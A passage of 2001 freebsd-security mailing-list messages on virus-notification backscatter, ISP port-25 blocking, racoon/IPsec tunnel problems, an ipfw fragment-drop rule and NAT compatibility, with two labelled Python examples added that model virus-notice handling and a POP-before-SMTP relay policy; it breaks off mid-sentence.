	by daedalus.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id SAA03451;
	Wed, 14 Mar 2001 18:47:45 -0500
Date: Wed, 14 Mar 2001 18:47:45 -0500 (EST)
From: Mikhail Kruk <meshko@cs.brandeis.edu>
To: Szilveszter Adam <sziszi@petra.hos.u-szeged.hu>
Cc: <freebsd-security@FreeBSD.ORG>
Subject: Re: Sophos and Virus return mail
In-Reply-To: <20010314231442.F12391@petra.hos.u-szeged.hu>
Message-ID: <Pine.LNX.4.30.0103141845170.3442-100000@daedalus.cs.brandeis.edu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > Ralph Huntington wrote:
> > > > (This is one case where blocking of port 25 by ISPs is a good thing.)
>
> Yes. And makes using eg send-pr(1) real fun(TM). Enjoying all the benefits
> of such a setup right now. While we are at it, why not firewall off the
> whole Net by just allowing a few things through proxies like www and ftp
> just so that a few morons are safe? Anyways, who would use such esoteric
> things as "cvsps" or "cvsup" and what are these etc. You can see where this
> is leading. Unfortunately network administration only looks simple if you
> are the one sitting at the admin console. Otherwise, it can quickly become
> a set of annoying limitations that hinder you @work or @play. Cool. I
> really feel like paying a lot for Internet access with these conditions.

My DSL provider, Mindspring, blocks port 25 and I am quite happy about it.
Of course send-pr doesn't work out of the box, but you can configure
everything to work through their mail server.  Blocking one port is very
far from blocking all ports except 80, it's a bad analogy. This measure is
directed at a very specific kind of activity (spamming) and does not
affect the vast majority of the users.


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Mar 14 16:41: 5 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21])
	by hub.freebsd.org (Postfix) with ESMTP id 53C1D37B718
	for <freebsd-security@FreeBSD.ORG>; Wed, 14 Mar 2001 16:41:01 -0800 (PST)
	(envelope-from rjh@mohawk.net)
Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21])
	by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id TAA24722;
	Wed, 14 Mar 2001 19:55:59 -0500 (EST)
	(envelope-from rjh@mohawk.net)
Date: Wed, 14 Mar 2001 19:55:59 -0500 (EST)
From: Ralph Huntington <rjh@mohawk.net>
To: Mikhail Kruk <meshko@cs.brandeis.edu>
Cc: Szilveszter Adam <sziszi@petra.hos.u-szeged.hu>,
	freebsd-security@FreeBSD.ORG
Subject: Re: Sophos and Virus return mail
In-Reply-To: <Pine.LNX.4.30.0103141845170.3442-100000@daedalus.cs.brandeis.edu>
Message-ID: <Pine.BSF.4.21.0103141954100.24577-100000@mohegan.mohawk.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

No, Ralph Huntington did not write that. He responded to that, as you have
done. Someone else said that about port 25 and ISPs. So let's drop it
already.

On Wed, 14 Mar 2001, Mikhail Kruk wrote:

> > > Ralph Huntington wrote:
> > > > > (This is one case where blocking of port 25 by ISPs is a good thing.)
> >
> > Yes. And makes using eg send-pr(1) real fun(TM). Enjoying all the benefits
> > of such a setup right now. While we are at it, why not firewall off the
> > whole Net by just allowing a few things through proxies like www and ftp
> > just so that a few morons are safe? Anyways, who would use such esoteric
> > things as "cvsps" or "cvsup" and what are these etc. You can see where this
> > is leading. Unfortunately network administration only looks simple if you
> > are the one sitting at the admin console. Otherwise, it can quickly become
> > a set of annoying limitations that hinder you @work or @play. Cool. I
> > really feel like paying a lot for Internet access with these conditions.
> 
> My DSL provider, Mindspring, blocks port 25 and I am quite happy about it.
> Of course send-pr doesn't work out of the box, but you can configure
> everything to work through their mail server.  Blocking one port is very
> far from blocking all ports except 80, it's a bad analogy. This measure is
> directed at a very specific kind of activity (spamming) and does not
> affect vast majority of the users.
> 
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
> 


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Mar 14 18: 5:43 2001
Delivered-To: freebsd-security@freebsd.org
Received: from dell.dannyland.org (dell.dannyland.org [64.81.36.13])
	by hub.freebsd.org (Postfix) with ESMTP id CFB7937B71A
	for <freebsd-security@freebsd.org>; Wed, 14 Mar 2001 18:05:39 -0800 (PST)
	(envelope-from dannyman@toldme.com)
Received: by dell.dannyland.org (Postfix, from userid 1001)
	id D4D125BF9; Wed, 14 Mar 2001 18:05:53 -0800 (PST)
Date: Wed, 14 Mar 2001 18:05:53 -0800
From: dannyman <dannyman@toldme.com>
To: Jim Durham <durham@w2xo.pgh.pa.us>
Cc: freebsd-security@freebsd.org
Subject: Re: Sophos and Virus return mail
Message-ID: <20010314180553.M3500@dell.dannyland.org>
References: <Pine.BSF.4.21.0103132338550.27904-100000@shazam.int>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0.1i
In-Reply-To: <Pine.BSF.4.21.0103132338550.27904-100000@shazam.int>; from durham@w2xo.pgh.pa.us on Tue, Mar 13, 2001 at 11:54:01PM -0500
X-Loop: djhoward@uiuc.edu
X-URL: http://www.dannyland.org/~dannyman/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, Mar 13, 2001 at 11:54:01PM -0500, Jim Durham wrote:
> Great discussion going on about Sophos and Amavis!
> 
> This may be something I'm missing, but there are several
> virii that apparently send no "envelope from" address when
> they generate virus mail. One that comes to mind is the
> stupid "Snow White" thing.
[...]

I get a couple of those a day in my root folder.

At least.

I just check the originating IP and make sure it is not one of my users. :)

-d

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
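The three positions in this thread (Jim Durham's reply-address cascade, Garrett Wollman's "notify the envelope destination and drop", and the check of the originating IP against one's own users) side by side on one worm-style message. This is an added example, not code from the thread or from Sophos/AMaViS; the message is constructed (null envelope sender, forged From:, the infected PC as the first Received: hop), the local address ranges are assumptions, and the envelope recipient is taken from Delivered-To: since a scanner run from the MTA would have it from the envelope directly.

```python
import email
import ipaddress
import re
from email.utils import parseaddr

# Constructed sample (not a real capture): a worm delivery with a null
# envelope sender, a forged From:, and the infected PC as the first hop.
SAMPLE_MESSAGE = (
    "Return-Path: <>\n"
    "Delivered-To: victim@example.org\n"
    "Received: from mx.example.net (mx.example.net [192.0.2.10])\n"
    "\tby mail.example.org (Postfix) with ESMTP id 1234;\n"
    "\tWed, 14 Mar 2001 10:00:00 -0500\n"
    "Received: from pc-1234.dsl.example.com (pc-1234.dsl.example.com [203.0.113.45])\n"
    "\tby mx.example.net (Postfix) with SMTP id 5678;\n"
    "\tWed, 14 Mar 2001 09:59:50 -0500\n"
    "From: Hahaha <hahaha@sexyfun.net>\n"
    "To: victim@example.org\n"
    "Subject: Snowhite and the Seven Dwarfs - The REAL story!\n"
    "\n"
    "Constructed body; the infected attachment is omitted.\n"
)

IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def load(text):
    return email.message_from_string(text)


def envelope_sender(msg):
    """Return-Path contents without the angle brackets; "" for the null sender <>."""
    raw = (msg.get("Return-Path") or "").strip()
    if raw.startswith("<") and raw.endswith(">"):
        raw = raw[1:-1]
    return raw.strip()


def naive_reply_address(msg):
    """The cascade proposed in the thread: envelope from, then From:, else MAILER-DAEMON.
    On a worm this yields a forged or innocent third party's address (backscatter)."""
    addr = envelope_sender(msg)
    if addr:
        return addr
    _, addr = parseaddr(msg.get("From") or "")
    if addr:
        return addr
    return "MAILER-DAEMON"


def envelope_recipient(msg):
    """The local user the message was actually delivered to."""
    _, addr = parseaddr(msg.get("Delivered-To") or msg.get("To") or "")
    return addr


def originating_ip(msg):
    """Bottom-most Received: header is the hop closest to the sender; worms
    with their own SMTP engine appear here as the infected PC itself."""
    for hop in reversed(msg.get_all("Received") or []):
        m = IP_RE.search(hop)
        if m:
            return m.group(1)
    return None


def is_local_user(ip, local_nets):
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(net) for net in local_nets)


def decide(msg, local_nets):
    """Wollman's policy: tell the envelope recipient, drop the message, and note
    whether the originating host is one of ours (worth an internal follow-up)."""
    ip = originating_ip(msg)
    return {
        "action": "drop",
        "notify": envelope_recipient(msg),
        "naive_reply_to": naive_reply_address(msg),
        "origin_ip": ip,
        "origin_is_local": ip is not None and is_local_user(ip, local_nets),
    }
```

The `naive_reply_to` field is kept only to show what the cascade would have done: on this message it would send a virus notice to the forged `hahaha@sexyfun.net`, which is exactly the backscatter the thread ends up recommending against.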


From owner-freebsd-security  Wed Mar 14 18:37:18 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mine.kame.net (kame195.kame.net [203.178.141.195])
	by hub.freebsd.org (Postfix) with ESMTP
	id 323CC37B718; Wed, 14 Mar 2001 18:37:14 -0800 (PST)
	(envelope-from sakane@ydc.co.jp)
Received: from localhost ([3ffe:501:4819:1000:260:1dff:fe21:f766])
	by mine.kame.net (8.11.1/3.7W) with ESMTP id f2F2aRY24974;
	Thu, 15 Mar 2001 11:36:27 +0900 (JST)
To: Bob@Talarian.Com
Cc: FreeBSD-Security@FreeBSD.Org, FreeBSD-Questions@FreeBSD.Org
Subject: Re: Racoon Problem & Cisco Tunnel
In-Reply-To: Your message of "Sun, 11 Mar 2001 22:39:16 -0600"
	<3AAC52F4.1000602@Talarian.Com>
References: <3AAC52F4.1000602@Talarian.Com>
X-Mailer: Cue version 0.6 (010224-1625/sakane)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Message-Id: <20010315113552W.sakane@ydc.co.jp>
Date: Thu, 15 Mar 2001 11:35:52 +0900
From: Shoichi Sakane <sakane@ydc.co.jp>
X-Dispatcher: imput version 20000228(IM140)
Lines: 11
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> As near as I can tell, I have to run racoon and configure it for 
> pre-shared keys to talk to the cisco. But I don't think the racoon is 
> even starting right. I get this message: "ERROR: 
> pfkey.c:207:pfkey_handler(): pfkey X_SPDDUMP failed No such file or 
> directory." Happens with the config files I've written and the stock 
> ones. I'm running a freshly sup'd box with racoon-20010222a built from 
> ports.

I think there was another reason why racoon couldn't work.
This message means the SPD is empty.  It doesn't mean an error happens.
The tag, "ERROR" should be fixed.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Mar 14 18:59:29 2001
Delivered-To: freebsd-security@freebsd.org
Received: from cs4.cs.ait.ac.th (cs4.cs.ait.ac.th [192.41.170.16])
	by hub.freebsd.org (Postfix) with ESMTP id E6F0437B71D
	for <freebsd-security@FreeBSD.ORG>; Wed, 14 Mar 2001 18:59:24 -0800 (PST)
	(envelope-from on@cs.ait.ac.th)
Received: from banyan.cs.ait.ac.th (on@banyan.cs.ait.ac.th [192.41.170.5])
	by cs4.cs.ait.ac.th (8.9.3/8.9.3) with ESMTP id JAA03648
	for <freebsd-security@FreeBSD.ORG>; Thu, 15 Mar 2001 09:59:04 +0700 (GMT+0700)
Received: (from on@localhost)
	by banyan.cs.ait.ac.th (8.8.5/8.8.5) id JAA15200;
	Thu, 15 Mar 2001 09:59:16 +0700 (ICT)
Date: Thu, 15 Mar 2001 09:59:16 +0700 (ICT)
Message-Id: <200103150259.JAA15200@banyan.cs.ait.ac.th>
X-Authentication-Warning: banyan.cs.ait.ac.th: on set sender to on@banyan.cs.ait.ac.th using -f
From: Olivier Nicole <on@cs.ait.ac.th>
To: freebsd-security@FreeBSD.ORG
In-reply-to: <Pine.BSF.4.21.0103141119450.1452-100000@shazam.int> (message
	from Jim Durham on Wed, 14 Mar 2001 11:31:05 -0500 (EST))
Subject: Re: Sophos and Virus return mail
References:  <Pine.BSF.4.21.0103141119450.1452-100000@shazam.int>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi,

I would like to add my couple of cents to the topic.

Actually you should check Reply-To:, From: then the From envelope in
that order.

And in any case copy the email to one of those guys who monitor the
ISP with open relay and publish list for banning.

Port 25 in my opinion MUST be closed, as far as it goes for individual
users. In fact it could be closed even for corporate users as one bad
corporate customer could cause the whole ISP address range to be
banned.

A centralised email exchange point is the only efficient way for an ISP
to control that their users are not doing spam.

As far as relaying, it should be open from outside to inside
(considering the frontier is the ISP email exchange) and from inside
to outside. But not from outside to outside.

To address mobile configuration, say a customer using his laptop
outside the ISP domain, relay can be set-up to open from outside to
outside, for a limited period of time (usually 10 minutes) provided
that the laptop first does a connection with POP or IMAP. The laptop
identifies as a valid user of the ISP so he is allowed to use the
ISP email gateway for a while.

Olivier

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
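The relay policy described in the message above (outside to inside and inside to outside relayed, outside to outside only for a client address that has recently logged in to POP or IMAP), written out as a decision routine. This is an added example, not code from the thread or from any MTA; the inside network, the local domains and the 10-minute window are assumptions, and the POP/IMAP server is assumed to call `record_pop_login` after each successful login.

```python
import ipaddress


class RelayPolicy:
    """ISP mail-exchange relay policy: anyone -> inside and inside -> outside are
    relayed, outside -> outside only while the client address holds a grant
    obtained by authenticating to POP/IMAP ("POP-before-SMTP")."""

    def __init__(self, inside_nets, local_domains, window_seconds=600):
        self.inside_nets = [ipaddress.ip_network(n) for n in inside_nets]
        self.local_domains = {d.lower() for d in local_domains}
        self.window = window_seconds          # 10 minutes, as in the thread
        self._grants = {}                     # client address -> expiry time

    def record_pop_login(self, client_ip, now):
        """Called by the POP/IMAP server after a successful login (assumption)."""
        self._grants[ipaddress.ip_address(client_ip)] = now + self.window

    def _is_inside(self, addr):
        return any(addr in net for net in self.inside_nets)

    def _is_local_recipient(self, rcpt):
        _, _, domain = rcpt.rpartition("@")
        return domain.lower() in self.local_domains

    def _recently_authenticated(self, addr, now):
        expiry = self._grants.get(addr)
        if expiry is None:
            return False
        if now >= expiry:
            del self._grants[addr]            # grant has lapsed; forget it
            return False
        return True

    def may_relay(self, client_ip, rcpt, now):
        """Decide one RCPT TO for a connection from client_ip at time `now` (seconds)."""
        addr = ipaddress.ip_address(client_ip)
        if self._is_local_recipient(rcpt):    # outside -> inside, inside -> inside
            return True
        if self._is_inside(addr):             # inside -> outside
            return True
        return self._recently_authenticated(addr, now)   # outside -> outside
```

The grant is keyed on the source address alone, so every host sharing that address (behind a NAT, or on the same dial-up pool after the address is reassigned) inherits the relay permission for the rest of the window; that is the inherent limit of tying relay rights to a POP login rather than to the SMTP session itself.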


From owner-freebsd-security  Wed Mar 14 20:21:37 2001
Delivered-To: freebsd-security@freebsd.org
Received: from shorty.ahpcns.com (joemoore-host.dsl.visi.com [209.98.246.61])
	by hub.freebsd.org (Postfix) with ESMTP id 0EABD37B718
	for <freebsd-security@freebsd.org>; Wed, 14 Mar 2001 20:21:33 -0800 (PST)
	(envelope-from jomor@ahpcns.com)
Received: from ahpcns.com (localhost [127.0.0.1])
	by shorty.ahpcns.com (Postfix) with ESMTP id 828693A2DD
	for <freebsd-security@freebsd.org>; Wed, 14 Mar 2001 22:21:30 -0600 (CST)
Message-ID: <3AB0434A.2DEC2598@ahpcns.com>
Date: Wed, 14 Mar 2001 22:21:30 -0600
From: jomor <jomor@ahpcns.com>
Organization: ahpcns
X-Mailer: Mozilla 4.72 [en] (X11; I; FreeBSD 3.5-STABLE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: freebsd-security@freebsd.org
Subject: Re: IPSEC tunnel without gif?
References: <3AAEF702.9AC2715B@ahpcns.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

jomor wrote:

> I've been setting up a VPN with tunnel mode IPSEC and things are going
> OK so far but in searching the list archives, I've found some stuff that
> seems to imply that gif tunnels are not needed for tunnel mode. Is this
> true? I've only gotten it to work by pre-configuring the gif tunnel, but
> now I'm not sure if I have true "tunnel mode IPSEC" or "transport mode
> IPSEC" applied to an "IP-ENCAP" tunnel such as that suggested by the
> X-bone project.
>
>                         seeking enlightenment    ...jgm
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

Replying to my own post for those who are interested...

I have set up a simple test network to figure this out. It's similar to the
one in the ipsec.html page of the handbook except that I added a router to
split up the segment between the gateways in order to better simulate "the
Internet" piece.  Routes were in place only to provide connectivity between
the external interfaces of the "tunnel endpoint gateway" machines. The
router sitting in the middle of the whole thing had no knowledge of the
"private" networks. NAT was not enabled anywhere. The ipsec.conf files are
> just like the handbook page commands except that I made a version for esp
only and another version for ah (not "ah-old") and I specified "-m tunnel"
instead of "-m any". After executing setkey I was able to ping the remote
hosts for at least a little while. I was not able to connect long enough to
do anything useful.  Flushing and reloading the ipsec.conf file didn't
help. Only a reboot would get it going again (but not for long). I ran some
traces with a Network General sniffer and things looked as I expected while
the pings were working. When the pings stopped working I could see that one
of the gateways continued to transmit the pings, which did get to the
remote gateway. The gateway that received the pings was transmitting ARP
requests but strangely, it was trying to get the hardware address of the
other tunnel endpoint rather than that of the router in the middle. Since
the ARP requests were never answered, the ping response was never
transmitted. This behavior was identical for both ah and esp tunnels. After
rebooting all the machines, I created the gif tunnels and executed setkey.
I was able to ftp some 1-5 MB files this way. I left the setup running over
night so I'll see if it's still functioning in the morning. I'll be doing
some traces with the gif setup for comparison as well.

                            ...jgm


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Mar 14 20:40:46 2001
Delivered-To: freebsd-security@freebsd.org
Received: from dragon.awen.com (dragon.awen.com [208.176.22.138])
	by hub.freebsd.org (Postfix) with ESMTP id 9CA2437B719
	for <freebsd-security@FreeBSD.ORG>; Wed, 14 Mar 2001 20:40:44 -0800 (PST)
	(envelope-from mburgett@dragon.awen.com)
Received: (from mburgett@localhost)
	by dragon.awen.com (8.11.2/8.11.2) id f2F4eZB25117;
	Wed, 14 Mar 2001 20:40:35 -0800 (PST)
Message-Id: <200103150440.f2F4eZB25117@dragon.awen.com>
From: "Mike Burgett" <mburgett@awen.com>
To: "jomor" <jomor@ahpcns.com>
Cc: "freebsd-security@FreeBSD.ORG" <freebsd-security@FreeBSD.ORG>
Date: Wed, 14 Mar 2001 20:40:35 -0800
Reply-To: "Mike Burgett" <mburgett@awen.com>
X-Mailer: PMMail 2000 Professional (2.20.2030) For Windows 98 (4.10.2222)
In-Reply-To: <3AB0434A.2DEC2598@ahpcns.com>
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Subject: Re: IPSEC tunnel without gif?
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 14 Mar 2001 22:21:30 -0600, jomor wrote:

>The gateway that received the pings was transmitting ARP
>requests but strangely, it was trying to get the hardware
>address of the other tunnel endpoint rather than that of 
>the router in the middle. Since the ARP requests were never 
>answered, the ping response was never transmitted.

This sounds an awful lot like:

http://www.FreeBSD.org/cgi/query-pr.cgi?pr=21079

I added a static arp entry for my router awhile back to work around this 
very thing.

Thanks,
Mike




To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Mar 14 23:39:23 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82])
	by hub.freebsd.org (Postfix) with ESMTP id 40DBD37B719
	for <freebsd-security@freebsd.org>; Wed, 14 Mar 2001 23:39:19 -0800 (PST)
	(envelope-from cjc@rfx-216-196-73-168.users.reflexcom.com)
Received: from rfx-216-196-73-168.users.reflexcom.com ([216.196.73.168]) by mailhost01.reflexnet.net  with Microsoft SMTPSVC(5.5.1877.197.19);
	 Wed, 14 Mar 2001 23:37:08 -0800
Received: (from cjc@localhost)
	by rfx-216-196-73-168.users.reflexcom.com (8.11.1/8.11.1) id f2F7dGM24680;
	Wed, 14 Mar 2001 23:39:16 -0800 (PST)
	(envelope-from cjc)
Date: Wed, 14 Mar 2001 23:39:15 -0800
From: "Crist J. Clark" <cjclark@reflexnet.net>
To: Szilveszter Adam <sziszi@petra.hos.u-szeged.hu>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Sophos and Virus return mail
Message-ID: <20010314233915.E496@cjc-desktop.users.reflexcom.com>
Reply-To: cjclark@alum.mit.edu
References: <Pine.BSF.4.21.0103140841480.4793-100000@mohegan.mohawk.net> <200103141333.f2EDX0J19096@fusion.borderware.com> <20010314231442.F12391@petra.hos.u-szeged.hu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010314231442.F12391@petra.hos.u-szeged.hu>; from sziszi@petra.hos.u-szeged.hu on Wed, Mar 14, 2001 at 11:14:42PM +0100
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, Mar 14, 2001 at 11:14:42PM +0100, Szilveszter Adam wrote:
> > Ralph Huntington wrote:
> > > > (This is one case where blocking of port 25 by ISPs is a good thing.)
> 
> Yes. And makes using eg send-pr(1) real fun(TM).

Huh? send-pr(1) just uses sendmail. It gets forwarded the same way all
of your other mail does. What am I missing?
-- 
Crist J. Clark                           cjclark@alum.mit.edu

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Mar 14 23:43:18 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82])
	by hub.freebsd.org (Postfix) with ESMTP id A3FD537B71A
	for <security@freebsd.org>; Wed, 14 Mar 2001 23:43:16 -0800 (PST)
	(envelope-from cjc@rfx-216-196-73-168.users.reflexcom.com)
Received: from rfx-216-196-73-168.users.reflexcom.com ([216.196.73.168]) by mailhost01.reflexnet.net  with Microsoft SMTPSVC(5.5.1877.197.19);
	 Wed, 14 Mar 2001 23:41:16 -0800
Received: (from cjc@localhost)
	by rfx-216-196-73-168.users.reflexcom.com (8.11.1/8.11.1) id f2F7hHd24720;
	Wed, 14 Mar 2001 23:43:17 -0800 (PST)
	(envelope-from cjc)
Date: Wed, 14 Mar 2001 23:43:17 -0800
From: "Crist J. Clark" <cjclark@reflexnet.net>
To: Udo Erdelhoff <ue@nathan.ruhr.de>
Cc: security@FreeBSD.ORG
Subject: Re: ipfw rule -1?
Message-ID: <20010314234317.F496@cjc-desktop.users.reflexcom.com>
Reply-To: cjclark@alum.mit.edu
References: <20010313084020.A5859@agora.rdrop.com> <20010313232014.B496@cjc-desktop.users.reflexcom.com> <20010314220613.L83336@nathan.ruhr.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010314220613.L83336@nathan.ruhr.de>; from ue@nathan.ruhr.de on Wed, Mar 14, 2001 at 10:06:14PM +0100
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, Mar 14, 2001 at 10:06:14PM +0100, Udo Erdelhoff wrote:
> On Tue, Mar 13, 2001 at 11:20:14PM -0800, Crist J. Clark wrote:
> > Rule -1 is given for any packet dropped, but not dropped due to a user
> > rule or the default rule. A quick look at the source indicates the
> > above pseudo-rule and some other fragment issues (bogusfrag) are the
> > only such situations. 
> 
> Hmm, I have the following setup: A -current box mounts /usr/src5 and
> /usr/obj5 via NFS from a RELENG_4 box. Doing "make installworld" fails
> as soon there's a fragmented NFS packet - the fragments are dropped
> by rule -1.

The only time UDP packets would be dropped is when a m_pullup() call
fails. I am not sure what that implies, but it does not sound good.
I don't think that should be failing.
-- 
Crist J. Clark                           cjclark@alum.mit.edu

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Mar 15  0: 2:40 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtppop2pub.verizon.net (smtppop2pub.gte.net [206.46.170.21])
	by hub.freebsd.org (Postfix) with ESMTP
	id 4080637B719; Thu, 15 Mar 2001 00:02:32 -0800 (PST)
	(envelope-from res03db2@gte.net)
Received: from gte.net (evrtwa1-ar4-4-34-145-186.dsl.gtei.net [4.34.145.186])
	by smtppop2pub.verizon.net  with ESMTP
	; id MAA110143109
	Tue, 13 Mar 2001 12:56:47 -0600 (CST)
Received: (from res03db2@localhost)
	by gte.net (8.9.3/8.9.3) id KAA59416;
	Tue, 13 Mar 2001 10:49:28 -0800 (PST)
	(envelope-from res03db2@gte.net)
Date: Tue, 13 Mar 2001 10:49:27 -0800
From: Robert Clark <res03db2@gte.net>
To: Ted Mittelstaedt <tedm@toybox.placo.com>
Cc: Bob Van Valzah <Bob@Talarian.Com>, pW <packetwhore@stargate.net>,
	FreeBSD-Security@FreeBSD.ORG, FreeBSD-Questions@FreeBSD.ORG
Subject: Re: Racoon Problem & Cisco Tunnel
Message-ID: <20010313104927.A59404@darkstar.gte.net>
References: <3AACF40D.4080504@Talarian.Com> <000801c0ab8b$81d99ca0$1401a8c0@tedm.placo.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.4i
In-Reply-To: <000801c0ab8b$81d99ca0$1401a8c0@tedm.placo.com>; from tedm@toybox.placo.com on Mon, Mar 12, 2001 at 11:02:03PM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org



Ted, do you know of any online guidelines to writing protocols
that function well with NAT?


Or maybe a list of protocols that don't work well with NAT?


Thanks, [RC]


On Mon, Mar 12, 2001 at 11:02:03PM -0800, Ted Mittelstaedt wrote:
> >-----Original Message-----
> >From: owner-freebsd-questions@FreeBSD.ORG
> >[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Bob Van Valzah
> >Sent: Monday, March 12, 2001 8:07 AM
> >To: pW
> >Cc: FreeBSD-Security@FreeBSD.ORG; FreeBSD-Questions@FreeBSD.ORG
> >Subject: Re: Racoon Problem & Cisco Tunnel
> >
> >
> >Yes. The five DSL setups with which I'm familiar all grant at least one
> >public address per house. I believe all are static, but one might be
> >dynamic. Interference with protocols like IPSec is one of the reasons
> >why I'd make a public address a requirement when choosing a DSL
> >provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all
> >possible. Let's hasten the deployment of IPv6.
> >
> 

-snip-

> 
> NAT has proven itself reliable and vital and idiot engineers that design TCP
> protocols that assume everyone has a public IP number are just architecting
> their own failures, and their protocol's subsequent minimizing by the
> market.  I have some sympathy for protocols like IPSec that came to be
> during the same time - but organizational-to-organizational IPSec tunnels
> don't have to pass through the NAT - they can terminate on it.  But, anyone
> doing a new protocol today is a fool if it can't work through a NAT.
> 
> 
> 
> Ted Mittelstaedt                      tedm@toybox.placo.com
> Author of:          The FreeBSD Corporate Networker's Guide
> Book website:         http://www.freebsd-corp-net-guide.com

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Mar 15  1:40:17 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82])
	by hub.freebsd.org (Postfix) with ESMTP
	id A7FD537B719; Thu, 15 Mar 2001 01:40:11 -0800 (PST)
	(envelope-from cjc@rfx-216-196-73-168.users.reflexcom.com)
Received: from rfx-216-196-73-168.users.reflexcom.com ([216.196.73.168]) by mailhost01.reflexnet.net  with Microsoft SMTPSVC(5.5.1877.197.19);
	 Thu, 15 Mar 2001 01:38:04 -0800
Received: (from cjc@localhost)
	by rfx-216-196-73-168.users.reflexcom.com (8.11.1/8.11.1) id f2F9e3028801;
	Thu, 15 Mar 2001 01:40:03 -0800 (PST)
	(envelope-from cjc)
Date: Thu, 15 Mar 2001 01:39:55 -0800
From: "Crist J. Clark" <cjclark@reflexnet.net>
To: Robert Clark <res03db2@gte.net>
Cc: Ted Mittelstaedt <tedm@toybox.placo.com>,
	Bob Van Valzah <Bob@Talarian.Com>, pW <packetwhore@stargate.net>,
	FreeBSD-Security@FreeBSD.ORG, FreeBSD-Questions@FreeBSD.ORG
Subject: Re: Racoon Problem & Cisco Tunnel
Message-ID: <20010315013955.A28471@rfx-216-196-73-168.users.reflex>
Reply-To: cjclark@alum.mit.edu
References: <3AACF40D.4080504@Talarian.Com> <000801c0ab8b$81d99ca0$1401a8c0@tedm.placo.com> <20010313104927.A59404@darkstar.gte.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010313104927.A59404@darkstar.gte.net>; from res03db2@gte.net on Tue, Mar 13, 2001 at 10:49:27AM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, Mar 13, 2001 at 10:49:27AM -0800, Robert Clark wrote:
> 
> 
> Ted, do you know of any online guidelines to writing protocols
> that function well with NAT?
> 
> 
> Or maybe a list of protocols that don't work well with NAT?

One of the problems with NAT is that there are no standards. It
supports whatever the NAT software vendor felt like supporting. In
general, to be safe, the list of protocols that do not work well with
NAT are,

  1) Any protocol that is not TCP.

Except you usually can get by with UDP, but watch for timeouts that
